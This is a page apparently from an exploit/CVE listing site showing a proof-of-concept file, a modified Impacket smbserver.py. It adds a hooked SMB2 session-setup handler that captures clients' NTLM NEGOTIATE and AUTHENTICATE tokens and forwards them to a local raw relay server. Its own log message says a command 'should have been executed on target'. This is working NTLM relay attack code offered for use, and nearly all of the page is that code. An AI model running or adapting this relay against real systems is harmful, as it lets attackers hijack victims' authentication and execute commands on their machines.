5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / smbserver.py PY
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
#   Simple SMB Server example.
#
# Author:
#   Alberto Solino (@agsolino)
#

import sys
import argparse
import logging
import socket
import struct
import random

from impacket.examples import logger
from impacket import smbserver, version
from impacket.ntlm import compute_lmhash, compute_nthash
from impacket import smb3structs as smb3
from impacket import ntlm
from impacket.spnego import SPNEGO_NegTokenInit, SPNEGO_NegTokenResp, ASN1_AID, ASN1_SUPPORTED_MECH, TypesMech
from impacket.nt_errors import STATUS_MORE_PROCESSING_REQUIRED, STATUS_SUCCESS, STATUS_ACCESS_DENIED

if __name__ == '__main__':

    # Init the example's logger theme
    print(version.BANNER)

    parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a "
                                     "share specified as an argument. Usually, you need to be root in order to bind to port 445. "
                                     "For optional authentication, it is possible to specify username and password or the NTLM hash. "
                                     "Example: smbserver.py -comment 'My share' TMP /tmp")

    parser.add_argument('shareName', action='store', help='name of the share to add')
    parser.add_argument('sharePath', action='store', help='path of the share to add')
    parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares')
    parser.add_argument('-username', action="store", help='Username to authenticate clients')
    parser.add_argument('-password', action="store", help='Password for the Username')
    parser.add_argument('-computeraccountname', action="store", help='computer account name to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    parser.add_argument('-computeraccounthash', action="store", help='computer account NT hash to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    parser.add_argument('-computeraccountaes', action="store", help='computer account AES key to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    parser.add_argument('-computeraccountpassword', action="store", help='computer account NT hash to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    parser.add_argument('-computeraccountdomain', action="store", help='computer account domain to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    parser.add_argument('-dc-ip', action="store", help='IP of domain controller to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes for the Username, format is LMHASH:NTHASH')
    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    parser.add_argument('-ip', '--interface-address', action='store', default=argparse.SUPPRESS, help='ip address of listening interface ("0.0.0.0" or "::" if omitted)')
    parser.add_argument('-readonly', action='store_true', help='Only allow reading of files')
    parser.add_argument('-disablekerberos', action='store_true', help='Do not offer Kerberos authentication')
    parser.add_argument('-disablentlm', action='store_true', help='Do not offer NTLM authentication')
    parser.add_argument('-port', action='store', default='445', help='TCP port for listening incoming connections (default 445)')
    parser.add_argument('-dropssp', action='store_true', default=False, help='Disable NTLM ESS/SSP during negotiation')
    parser.add_argument('-6','--ipv6', action='store_true',help='Listen on IPv6')
    parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')
    parser.add_argument('-outputfile', action='store', default=None, help='Output file to log smbserver output messages')
    parser.add_argument('-relay-port', action='store', type=int, default=0, help='RAW relay server port to forward captured NTLM auth (0 = disabled)')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    try:
       options = parser.parse_args()
    except Exception as e:
       logging.critical(str(e))
       sys.exit(1)

    logger.init(options.ts, options.debug)

    if options.comment is None:
        comment = ''
    else:
        comment = options.comment

    if 'interface_address' not in options:
        options.interface_address = '::' if options.ipv6 else '0.0.0.0'

    server = smbserver.SimpleSMBServer(listenAddress=options.interface_address, listenPort=int(options.port), ipv6=options.ipv6)

    if options.outputfile:
        logging.info('Switching output to file %s' % options.outputfile)
        server.setLogFile(options.outputfile)

    server.addShare(options.shareName.upper(), options.sharePath, comment, readOnly="yes" if options.readonly else "no")
    server.setSMB2Support(options.smb2support)
    server.setDropSSP(options.dropssp)
    server.setKerberosSupport(not options.disablekerberos)
    server.setNTLMSupport(not options.disablentlm)

    # If a user was specified, let's add it to the credentials for the SMBServer. If no user is specified, anonymous
    # connections will be allowed
    if options.username is not None:
        # we either need a password or hashes, if not, ask
        if options.password is None and options.hashes is None:
            from getpass import getpass
            password = getpass("Password:")
            # Let's convert to hashes
            lmhash = compute_lmhash(password)
            nthash = compute_nthash(password)
        elif options.password is not None:
            lmhash = compute_lmhash(options.password)
            nthash = compute_nthash(options.password)
        else:
            lmhash, nthash = options.hashes.split(':')

        server.addCredential(options.username, 0, lmhash, nthash)

    # If we want clients to be able to connect to us which enforce signing, we need a computer account to properly setup the connection
    # Only works with SMB2
    required_secure_server_options = [options.computeraccountname, options.computeraccountdomain, options.dc_ip]
    at_least_one_secure_server_options = [options.computeraccounthash, options.computeraccountaes, options.computeraccountpassword]
    if any(required_secure_server_options):
        if options.username:
            logging.critical("You cannot use account credentials AND computer account credentials at the same time")
            sys.exit(1)
        if not all(required_secure_server_options):
            logging.critical("All of the following options need to be set for accepting signed connections from arbitrary users in the domain: -computeraccountname, -computeraccountdomain, -dc-ip")
            sys.exit(1)
        if not any(at_least_one_secure_server_options):
            logging.critical("At least one of the following options need to be set for accepting signed connections from arbitrary users in the domain: -computeraccounthash, -computeraccountaes, -computeraccountpassword")
            sys.exit(1)
        server.setComputerAccount(options.computeraccountname, options.computeraccounthash, options.computeraccountaes, options.computeraccountpassword, options.computeraccountdomain, options.dc_ip)

    # Here you can set a custom SMB challenge in hex format
    # If empty defaults to '4141414141414141'
    # (remember: must be 16 hex bytes long)
    # e.g. server.setSMBChallenge('12345678abcdef00')
    server.setSMBChallenge('')

    if options.relay_port > 0:
        internalServer = server.getServer()
        origSmb2SessionSetup = internalServer.hookSmb2Command(smb3.SMB2_SESSION_SETUP, None)

        _relay_state = {}

        def _extract_raw_ntlm(securityBlob):
            rawNTLM = False
            if len(securityBlob) == 0:
                return b'', 0, rawNTLM
            firstByte = struct.unpack('B', securityBlob[0:1])[0]
            if firstByte == ASN1_AID:
                blob = SPNEGO_NegTokenInit(securityBlob)
                token = blob['MechToken']
            elif firstByte == ASN1_SUPPORTED_MECH:
                blob = SPNEGO_NegTokenResp(securityBlob)
                token = blob['ResponseToken']
            else:
                token = securityBlob
                rawNTLM = True
            if len(token) >= 12 and token[:8] == b'NTLMSSP\x00':
                msgType = struct.unpack('<I', token[8:12])[0]
            else:
                msgType = 0
            return token, msgType, rawNTLM

        def _build_spnego_challenge_resp(challengeBlob, rawNTLM):
            if rawNTLM:
                return challengeBlob
            respToken = SPNEGO_NegTokenResp()
            respToken['NegState'] = b'\x01'
            respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
            respToken['ResponseToken'] = challengeBlob
            return respToken.getData()

        def _build_spnego_auth_resp(rawNTLM):
            if rawNTLM:
                return b''
            respToken = SPNEGO_NegTokenResp()
            respToken['NegState'] = b'\x00'
            return respToken.getData()

        def hookedSessionSetup(connId, smbServer, recvPacket):
            connData = smbServer.getConnectionData(connId, checkStatus=False)

            sessionSetupData = smb3.SMB2SessionSetup(recvPacket['Data'])
            securityBlob = sessionSetupData['Buffer']

            token, msgType, rawNTLM = _extract_raw_ntlm(securityBlob)

            state = _relay_state.get(connId, 'init')

            if state == 'init':
                result = origSmb2SessionSetup(connId, smbServer, recvPacket)
                if msgType == 3:
                    _relay_state[connId] = 'first_auth_done'
                return result

            if state in ('first_auth_done', 'relay_negotiated') and msgType == 1:
                oldSock = connData.get('relaySocket')
                if oldSock:
                    try:
                        oldSock.close()
                    except:
                        pass
                    connData['relaySocket'] = None
                logging.info("[RELAY] Second SESSION_SETUP detected (NTLM NEGOTIATE) - relaying to RAW server port %d", options.relay_port)
                try:
                    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    sock.settimeout(10)
                    sock.connect(('127.0.0.1', options.relay_port))
                    sock.sendall(struct.pack('<h', len(token)) + token)
                    chal_len = struct.unpack('<h', sock.recv(2))[0]
                    challengeBlob = b''
                    while len(challengeBlob) < chal_len:
                        challengeBlob += sock.recv(chal_len - len(challengeBlob))
                except Exception as e:
                    logging.error("[RELAY] Failed to connect/relay NEGOTIATE to RAW server: %s", e)
                    respCmd = smb3.SMB2SessionSetup_Response()
                    respCmd['SecurityBufferOffset'] = 0x48
                    respCmd['SecurityBufferLength'] = 0
                    respCmd['Buffer'] = b''
                    return [respCmd], None, STATUS_ACCESS_DENIED

                connData['relaySocket'] = sock
                connData['relayRawNTLM'] = rawNTLM
                connData['Uid'] = random.randint(1, 0xffffffff)
                _relay_state[connId] = 'relay_negotiated'

                respBytes = _build_spnego_challenge_resp(challengeBlob, rawNTLM)
                respCmd = smb3.SMB2SessionSetup_Response()
                respCmd['SecurityBufferOffset'] = 0x48
                respCmd['SecurityBufferLength'] = len(respBytes)
                respCmd['Buffer'] = respBytes
                smbServer.setConnectionData(connId, connData)
                return [respCmd], None, STATUS_MORE_PROCESSING_REQUIRED

            if state == 'relay_negotiated' and msgType == 3:
                logging.info("[RELAY] Received NTLM AUTHENTICATE - forwarding to RAW server")
                sock = connData.get('relaySocket')
                if sock is None:
                    respCmd = smb3.SMB2SessionSetup_Response()
                    respCmd['SecurityBufferOffset'] = 0x48
                    respCmd['SecurityBufferLength'] = 0
                    respCmd['Buffer'] = b''
                    return [respCmd], None, STATUS_ACCESS_DENIED

                try:
                    sock.sendall(struct.pack('<h', len(token)) + token)
                    result_len = struct.unpack('<h', sock.recv(2))[0]
                    success_data = sock.recv(result_len)
                    relaySuccess = struct.unpack('?', success_data[:1])[0]
                    sock.close()
                except Exception as e:
                    logging.error("[RELAY] Failed to relay AUTH to RAW server: %s", e)
                    try:
                        sock.close()
                    except:
                        pass
                    respCmd = smb3.SMB2SessionSetup_Response()
                    respCmd['SecurityBufferOffset'] = 0x48
                    respCmd['SecurityBufferLength'] = 0
                    respCmd['Buffer'] = b''
                    return [respCmd], None, STATUS_ACCESS_DENIED

                if relaySuccess:
                    logging.info("[RELAY] NTLM relay succeeded! Command should have been executed on target.")
                    connData['Authenticated'] = True
                    connData['relaySocket'] = None
                    _relay_state[connId] = 'first_auth_done'
                    respBytes = _build_spnego_auth_resp(connData.get('relayRawNTLM', False))
                    respCmd = smb3.SMB2SessionSetup_Response()
                    respCmd['SecurityBufferOffset'] = 0x48
                    respCmd['SecurityBufferLength'] = len(respBytes)
                    respCmd['Buffer'] = respBytes
                    smbServer.setConnectionData(connId, connData)
                    return [respCmd], None, STATUS_SUCCESS
                else:
                    logging.error("[RELAY] NTLM relay failed - authentication rejected")
                    connData['relaySocket'] = None
                    _relay_state[connId] = 'first_auth_done'
                    respCmd = smb3.SMB2SessionSetup_Response()
                    respCmd['SecurityBufferOffset'] = 0x48
                    respCmd['SecurityBufferLength'] = 0
                    respCmd['Buffer'] = b''
                    return [respCmd], None, STATUS_ACCESS_DENIED

            logging.warning("[RELAY] Unexpected state=%s msgType=%d", state, msgType)
            return origSmb2SessionSetup(connId, smbServer, recvPacket)

        internalServer.hookSmb2Command(smb3.SMB2_SESSION_SETUP, hookedSessionSetup)
        logging.info("[RELAY] SMB2 SESSION_SETUP hook installed, relay port=%d", options.relay_port)

    # Rock and roll
    try:
        server.start()
    except KeyboardInterrupt:
        print("\nInterrupted, exiting...")
        sys.exit(130)